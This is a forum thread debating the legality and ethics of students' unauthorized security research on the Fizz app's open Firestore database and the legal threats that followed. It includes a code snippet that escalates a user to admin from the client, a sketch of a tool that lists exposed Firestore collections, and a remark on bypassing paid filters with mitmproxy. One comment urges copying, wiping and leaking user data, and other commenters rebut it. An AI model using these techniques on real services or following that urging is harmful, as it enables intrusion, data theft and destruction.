* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database access they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplated retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession from the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
https://www.justice.gov/opa/pr/department-justice-announces-...
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought their attention to the need for them. If you've been operating a publicly available service with a serious vulnerability, you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service; they would still be incurring it even if they had discovered the vulnerability themselves, unless they'd caught it before putting the service into production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
It reminds me of the case where AT&T had their iPad subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could, which isn't the case here.
Simply put, anyone who "accesses a computer without authorization ... and thereby obtains ... information from any protected computer" is in violation of the CFAA.
If the researchers in question did not download any customer data, nor cause any "damages", I am not sure they are guilty of anything. BUT, if they had, "the victim had insufficient security measures" is not a valid defense. These researchers were not authorized to access this computer, regardless of whether they were technically able to obtain access.
Leaving your door unlocked does not give burglars permission to burgle you.
He ended up in prison.
(The conviction was later overturned on a jurisdictional detail, but I think he spent several months in federal prison.)
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
If some less ethical hackers got a hold of that data, much worse things could have happened.
* that's the biggest red flag. A company claiming "100%" obviously has very little actual security expertise.
PS: I'm a big fan of Germany's https://www.ccc.de/en/ who have pulled many such hacks against some of the biggest tech companies.
It is absolutely the right, and IMO, the duty, of security researchers to test every website, app, product and service that they use regularly to ensure the continued safety of the general public. This is too important of a field to have a "not my problem" attitude of just ignoring egregious security vulnerabilities so they can be exploited by criminals.
I was looking for a comment like this. You couldn't pay me enough to do this sort of thing in this day and age (unless working for a DoD or three-letter-agency contractor, which would have my back covered), never mind doing it pro bono or bona fide or whatever it is that these guys had in mind (either way, it looks like they were not paid to do it).
This sort of action might still have been sort of ok-ish in the late '00s, maybe going into 2010 or 2011. But when the Russian/Chinese/North Korean/Iranian cyber threats became real (plus the whole Snowden fiasco), related laws began to change (both in the US and in Europe), and doing this sort of stuff with no one to back you up for real (forget the EFF) meant that the one doing it would be asking for trouble in a big way.
The question isn't whether it should be done, but whether it should be done anonymously or openly.
TL;DR: it was good faith security research, and the US DoJ doesn't prosecute that.
Because bug bounties?
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.
[1] https://www.justice.gov/opa/pr/department-justice-announces-...
> If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
I am extremely not a lawyer, but the pattern of legal posturing I've observed is that some lawyer makes grand over-reaching statements, and the opposing lawyer responds with their own grand over-reaching statements. "My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
Ignoring the legalities of it all, this step crosses a line morally imo.
> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
Really what happened is we checked whether we could set `isAdmin` to `true` on our existing accounts, and... we were able to. Adi's more technical writeup has details: https://saligrama.io/blog/post/firebase-insecure-by-default/
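For anyone who hasn't used Firebase: from the client, that kind of write is close to a one-liner. A minimal sketch, assuming the v9 web SDK; the collection name and config values here are placeholders, not Fizz's actual schema (the real details are in the writeup linked above):

```typescript
// Sketch of a client-side privilege escalation against a Firestore database
// with no restrictive security rules. "users" and the config values are
// hypothetical placeholders.
import { initializeApp } from "firebase/app";
import { getFirestore, doc, updateDoc } from "firebase/firestore";

const app = initializeApp({
  apiKey: "PUBLIC_WEB_API_KEY", // web API keys ship in every frontend bundle
  projectId: "example-project", // placeholder
});
const db = getFirestore(app);

// With no security rules restricting writes, a logged-in client can update
// fields on its own user document that the server was supposed to own:
async function makeSelfAdmin(uid: string): Promise<void> {
  await updateDoc(doc(db, "users", uid), { isAdmin: true });
}
```

Nothing server-side checks that write unless the project's security rules forbid it.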
We all know there is no such thing as something 100% secure, but if you're gonna go making wild claims, you should have to stand by them.
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
Fizz may have violated more than a state bar rule; this could very well be extortion (depending on the specifics).
I would tend to agree with the balance of your comments.
I've seen examples of employment contracts with things like "if any piece of this contract is invalid, it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they face no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader to know (and the reader tends to be the much weaker party).
Same here. Why can a company send a threatening letter ("you'll go to federal prison for 20 years for this!!") when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequence beyond "oh, never mind"?
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a subsection is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
In a right-to-work state, what protections can an individual realistically expect to receive from a contract?
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation. Wouldn't that likely impact the weaker parties worse, as they have less access to high-powered legal authors? If even negotiating wording changes to a contract becomes a liability nightmare for the negotiators, doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
You’ll want the originally negotiated contract, minus the clause that can’t be enforced.
However, taken down one notch from theoretical to more practical:
> It seems like you're arguing for some sort of punitive response to authoring a bad contract?
Not quite so bluntly, but yes. There's obviously a gray area here, so not for mistakes or subtle technicalities. But if one party is being intentionally or absurdly overreaching, then yes, I believe there should be some proportional punishment. Particularly if the writing party's intent is to scare the other side into inaction rather than a core belief that their wording is true.
The way I think of it is maybe in similar terms as disbarring or something like that. So not something that would be a day-to-day concern for honest people doing honest work, but some potential negative consequences if "you're taking it too far" (of course this last bit is completely handwavy).
Maybe such a mechanism exists that I'm not aware of.
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
Does it have to be this way?
“the Group’s actions are also a violation of Buzz’s Terms of Use and constitute a breach of contract, entitling Buzz to compensatory damages and damages for lost revenue.”
“the Group’s agreement to infiltrate Buzz’s network is also a separate offense of conspiracy, exposing the Group to even more significant criminal liability.”
Emphasis added. The language is quite a bit more forceful and threatening than you make it out to be. Given that they were issuing these threats as an ultimatum, a "keep quiet about this or else...", it was likely a violation of the California State Bar's rules of professional conduct.
I disagree with OP - a judge can always choose to invalidate a contract, regardless of severability. It is in there for the convenience of the parties, and I've not heard of it being used in bad faith.
They threatened that if they received written confirmation that the researchers wouldn't discuss the security issues, they wouldn't pursue charges.
The lawyers were very much not "for your information you could be liable for x if someone responded poorly", they were in fact responding poorly.
Sure, you still get some of that today (an especially old-fashioned company, or in this case naive college students), but overall things have shifted quite dramatically in favor of disclosure: dedicated middlemen who protect security researchers' identities, large enterprises encouraging and celebrating disclosure, six-figure bug bounties; even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant for the author to go through this, but it's a nice reminder that situations like this are now somewhat rare, whereas they used to be the norm (or worse).
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact that in the actual courts you are guilty of a crime.
This is still the way to go even in many western countries.
https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
That's wild!
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
For example, say the statute of limitations for 18 USC 1030 is two years. If a person hypothetically stole a scooter by hacking, two years later, they would be in the clear, right?
No. The discovery rule says that if a damaged party, for good reason, does not immediately discover their loss, the statute of limitations is paused until they do.
Accordingly, if the scooter company read a post today about a hack that happened “a long time ago” and therein discovered their loss, the statute of limitations would begin to tick today and the hacker could be in legal jeopardy for two more years.
So the blame for this rests entirely on the dev team.
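For reference, locking a Firestore database down is a few lines of configuration. A generic default-deny ruleset in Firestore's security rules language (a sketch of the standard pattern, not Fizz's actual config):

```
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // Deny everything by default; individual collections then get explicit
    // allow rules (e.g. a user may read/write only their own document).
    match /{document=**} {
      allow read, write: if false;
    }
  }
}
```

Anything looser than an explicit per-collection allow list leaves the database queryable by anyone holding the public API key.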
You could also bypass the filter that prevents under-18 users from searching for over-18 users (and vice versa), as well as paid-only filters like location, gender, etc., by rewriting the requests with mitmproxy (paid status is not checked server-side).
I imagine a web tool that could take the app id and other api values (that are publicly embedded in frontend apps), optionally support a session id (for those firestore apps that use a lightweight “only visible to logged in users” security rule) and accept names of collections (found in the js code) to explore?
[1] https://github.com/iosiro/baserunner
[2] https://saligrama.io/blog/post/firebase-insecure-by-default/
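A rough sketch of what the core of such a tool might look like, using Firestore's documented REST API. The `listCollection` helper name is hypothetical; the project id, API key, and collection names are exactly the publicly embedded values described above, and the optional ID token covers the "only visible to logged in users" case:

```typescript
// Hypothetical probe: list documents from a Firestore collection using only
// values embedded in a frontend bundle. Reads succeed only if the project's
// security rules allow them.
async function listCollection(
  projectId: string,
  apiKey: string,
  collection: string,
  idToken?: string,
): Promise<unknown> {
  const url =
    `https://firestore.googleapis.com/v1/projects/${projectId}` +
    `/databases/(default)/documents/${encodeURIComponent(collection)}` +
    `?key=${apiKey}`;
  const res = await fetch(url, {
    headers: idToken ? { Authorization: `Bearer ${idToken}` } : {},
  });
  if (!res.ok) throw new Error(`Firestore returned ${res.status}`);
  return res.json();
}
```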
> Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And, it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
https://web.archive.org/web/20220204044213/https://fizzsocia...
What I was looking for was if they really had a page that claimed "100% secure", but I don't think that was captured by archive.org
It's only legal to actually pursue the legal action, period. Once you pull in a THREAT, it becomes blackmail/extortion.
1. threatening violence is explicitly a crime
2. at a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. threatening to do a legal act is largely legal. it's not illegal to threaten reporting to the authorities, for instance.
It absolutely can be illegal, in the case of extortion. If you say "do this or I turn you in" that's extortion.
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure", knowing you are not secure, and your users have no protection against spying from you or any minimally competent hacker, is fraud at minimum, but closer to criminal wiretapping, since you're knowingly tricking your users into revealing their secrets on your service, thinking they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
After that, that they continued their "100% secure" marketing on one side, while threatening researchers into silence on the other, is plainly malicious.
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.
Fantastic for calling Fizz out. "Fizz did not protect their users’ data. What happened next?" This isn't a "someone hacked them". It's that Fizz failed to do what they promised.
I'm still curious to hear if the vulnerability has been tested to see if it's been resolved.
I don't think this applies to the reporter in this case, but it does seem like there's a bit of a trend in security research lately to capitalize on the publicity of finding a vulnerability for one's own personal branding. That feels a bit disingenuous. Not that the appropriate response would be to threaten someone with legal action.
It's not about personal branding, it's about protecting the users of the app. Either the app fixes the vulnerability so the users are no longer in danger, or the users are made aware that they are in danger.
It's completely fine to discuss or request a different disclosure date when communicating with researchers. The delay is their protection against inaction.
On the other hand, assuming the app creators were in far over their heads when it comes to proper security, I have to wonder if they started off cordially and then freaked out a short while later because, after trying, they realized there was no possible way for them to correct the issue in the given timeline. So in desperation they resorted to something drastic (and arguably unethical) to cover their asses.
It's practically a given that the actual security (or privacy) of a piece of software is inversely proportional to its claimed security and how loud those claims are. Also, the companies that pay the least attention to security are always the ones who later, after the breach, say "We take security very seriously..."
In all honesty, nothing good usually comes from that. If they wanted the truth to be exposed, they would have been better off exposing it anonymously to the company and/or the public if needed.
It's one thing to happen upon a vulnerability in normal use and report it. It's a different beast to gain access to servers you don't own and start touching things.
“Keep calm” and “be responsible” and “speak to a lawyer” are things I class as common sense. The gold nugget I was looking for was the red flashing shipwreck buoy/marker over the names.
https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
Am I to understand you can attempt to hack any computer to gain unauthorized access without prior approval? That doesn't seem legal at all.
Whether or not there was a vulnerability, was the action taken actually legal under current law? I don't see anything indicating for or against in the article. Just posturing that "ethical hacking" is good and saying you are secure when you aren't is bad. None of that seems relevant to the actual question of what the law says.
(b) You don't require permission to test software running on hardware you control (absent some contract that says otherwise).
(c) But you're right, in this case, the researchers presumably did need permission to conduct this kind of testing lawfully.
Weird stance. Sure, you may disagree on the limitations of scope of various ethical hacking programs (bug bounties and such) but they consistently highlight some very serious flaws in all kinds of hardware and software.
Going out of scope (hacking a company with no program in place) is always a gamble and you’re betting on the leniency of the target. Probably not worth it unless you like to live dangerously.
Kudos to Cooper, Miles and Aditya for seeing this through.
They could threaten to report you to the police or such authorities, but they would have to turn over their evidence to them and to you and open all their relevant records to you via discovery.
> Get a lawyer
Yes, if they're seriously threatening legal action they already have one.
That's not true, depending on where you live in the US. Several states allow private citizens to file criminal charges with a magistrate. IIRC, NJ law allows actual private prosecution of criminal charges, subject to approval by a judge and prosecutor. I think that's a holdover from English common law.
That would've been a better legal threat to put on them as an offensive move, instead of using the EFF. "Sure, you can attempt to have me jailed, but your threat is clear-cut felony extortion. See you in the jail cell right there with me!"
Maybe it's because I'm getting old, but it would never cross my mind to take any of this personally.
If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats it's pretty clear they have no idea what they're doing.
Being the "good guy" can sometimes be harder than being the "bad guy", but suppressing your emotions is a basic requirement for being either "guy".
Yup, that's it :) These kids are either in college or just graduated. They were smart enough to get themselves legal help before saying anything stupid, which is impressive. Cut them some slack!
And yet, according to the linked article in the Stanford Daily, they received $4.5 million in funding
This is wholly and obviously illegal, but so is the described ethical hacking. You have adopted a complex, nuanced strategy to minimize harm to all parties. This is great morally, but as far as I can tell it's only meaningful legally insofar as it makes folks less likely to go after you; nothing about it makes your obviously illegal actions legal. So if you are going to openly flout the law, it makes sense to put less of a target on your back while you are breaking it.
Payouts for finding bugs when there isn't an already established process are either not going to be worth your time or will be seen as malicious activity.
The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and protect their anonymity while doing all 3 of these.
If these researchers had done (2) and (3) – and done so anonymously, that would have not only protected them from legal threats/harm, but also effectively killed off a company that shouldn't exist – since all of Buzz/Fizz users would likely abandon it as consequence.
Aaron Swartz only did (1). Failing at the anonymity part didn't end so well for him.
I get that you're frustrated but encouraging others to make martyrs of themselves is cowardice. If some dumb kid tries this and their opsec isn't bulletproof, they're fucked. Put your own skin in the game and do it yourself if your convictions are that strong.
It's especially unwise because you now give the company a massive incentive to hire real forensics specialists to try to track you down. You're placing a lot of faith in your ability to remain anonymous under that level of scrutiny.
No, it wouldn’t. Anonymity can be penetrated, and the more incentive people have to do so, the more likely it will be.
Is that the clinical term for Internet Tough Guy?
I imagine deleting the DB would almost certainly lead to actual CFAA consequences. Which kinda suck, as I recall.
[0]: https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
Personally, I don't see it as worth it to pursue a company that does not hang out some sort of public permission to poke at them. The upside is minimal and the downside significant. Note this is a descriptive statement, not a normative statement. In a perfect world... well, in a perfect world there'd be no security vulnerabilities to find, but... in a perfect world sure you'd never get in trouble for poking through and immediately backing off, but in the real world this story just happens too often. Takes all the fun right out of it. YMMV.
Nothing else is ethically viable. Nothing else protects the researcher.
This during a time when thousands or millions have their personal data leaked every other week, over and over, because companies don't want to cut into their profits.
Researchers who do the right thing face legal threats of 20 years in prison. Companies who cut corners on security face no consequences. This seems backwards.
Remember when a journalist pressed F12 and saw that a Missouri state website was exposing the personal data of every teacher in the state (including SSNs)? He reported the security flaw responsibly, and because it was embarrassing to the State, the Governor attacked and legally harassed him. https://arstechnica.com/tech-policy/2021/10/missouri-gov-cal...
I once saw something similar: a government website exposing the personal data of licensed medical professionals. A REST API responded with all their personal data (including SSN, address, etc.), but the HTML frontend wouldn't display it. All the data was just an unauthenticated REST call away, for thousands of people in the state. What did I do? I just closed the tab and never touched the site again. It wasn't worth the personal risk to try to do the right thing, so I ignored it, and for all I know all those people had their data stolen multiple times over because of this security flaw. I found the flaw as part of my job at the time; I don't remember the details anymore. It has probably been fixed by now. Our legal system made it a huge personal risk to do the right thing, so I didn't do the right thing.
Which brings me to my point. We need strong protections for those who expose security flaws in good faith. Even if someone is a grey hat and has done questionable things as part of their "research", as long as they report their security findings responsibly, they should be protected.
Why have we prioritized making things nice and convenient for the companies over all else? If every American's data gets stolen in a massive breach, it's so sad, but there's nothing we can do (shrug). If one curious user or security research pokes an app and finds a flaw, and they weren't authorized to do so, OMG!, that person needs to go to jail for decades, how dare they press F12!!!1
This is a national security issue. While we continue to see the same stories of massive breaches in the news over and over and over, and some of us get yet another free year of monitoring that credit agencies don't commit libel against us, just remember that we put the convenience of companies above all else. They get to opt-in to having their security tested, and over and over they fail us.
Protect security researchers, and make it legal to test the security of an app even if the owning company does not consent. </rant>
If that happens the whole calculus of bug bounties changes immediately.
How do devs forget this step before raising 4.5 million in seed funding?
If a curious kid does a port scan, police will smash down doors. People will face decades in prison.
If a negligent company leaks the private data of every single American, well, gee, what could we have done more, we had that one company do an audit and they didn't find anything and, gee, we're just really sorry, so lets all move on and here's a free year of credit monitoring which you may choose to continue paying us for at the end of the free year.
It's effectively legalizing fraud for a big chunk of computer security. Sure fraud itself is technically still illegal, but so is exposing it.
My understanding is that these security researchers only accessed their own accounts and data on the cloud servers, and in doing so they did not bypass any "effective technical protections on access."
Thankfully for all of us, the DoJ appears to disagree with your sentiment. At least with the current administration.
Is it your position that when you are lied to, and your sensitive and personally identifying information is being grossly mishandled by a company, your only recourse is to spend thousands of dollars and incredible amounts of time on a court case that has very little chance of achieving anything?